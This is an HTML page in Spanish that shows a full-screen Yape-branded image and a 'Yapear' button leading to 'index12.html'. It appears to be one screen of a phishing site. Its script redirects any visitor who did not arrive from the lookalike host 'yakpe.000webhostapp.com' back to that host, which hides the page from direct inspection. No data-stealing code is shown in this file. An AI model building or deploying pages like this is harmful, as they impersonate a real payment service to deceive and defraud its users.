<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Imagen Adaptada para Móviles</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0; /* Cambiar el color de fondo */
        }

        .image-container {
            max-width: 100%;
            height: auto;
            position: relative;
        }

        img {
            max-width: 100%;
            height: auto;
        }

        .button-container {
            position: absolute;
            bottom: 10px;
            right: 10px;
            z-index: 1000;
        }

        .button {
            background-color: #00ff8c83; /* Cambiar a color verde fluorescente */
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="image-container">
        <!-- Aquí puedes colocar la ruta de tu imagen -->
        <img src="principal_yape.jpg" alt="Imagen">
        
        <!-- Botón de abrir el contenido del index12.html -->
        <div class="button-container">
            <button class="button" onclick="abrirIndex12()">Yapear</button>
        </div>
    </div>

    <script>
        if (document.referrer !== "https://yakpe.000webhostapp.com/") {
            window.location.href = "https://yakpe.000webhostapp.com/";
        } else {
            function abrirIndex12() {
                // Redireccionar a index12.html
                window.location.href = 'index12.html';
            }
        }
    </script>
</body>
</html>
